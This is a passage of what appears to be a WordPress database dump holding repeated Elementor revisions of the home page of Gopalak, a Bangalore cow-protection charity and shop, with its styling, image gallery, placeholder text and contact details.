/></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:54:08','2022-10-13 10:24:08','',1373,'https://gopalak.in/?p=1714',0,'revision','',0),(1715,1,'2022-10-13 15:54:08','2022-10-13 10:24:08','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:54:08','2022-10-13 10:24:08','',1373,'https://gopalak.in/?p=1715',0,'revision','',0),(1716,1,'2022-10-13 15:54:55','2022-10-13 10:24:55','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:54:55','2022-10-13 10:24:55','',1373,'https://gopalak.in/?p=1716',0,'revision','',0),(1717,1,'2022-10-13 15:54:56','2022-10-13 10:24:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading 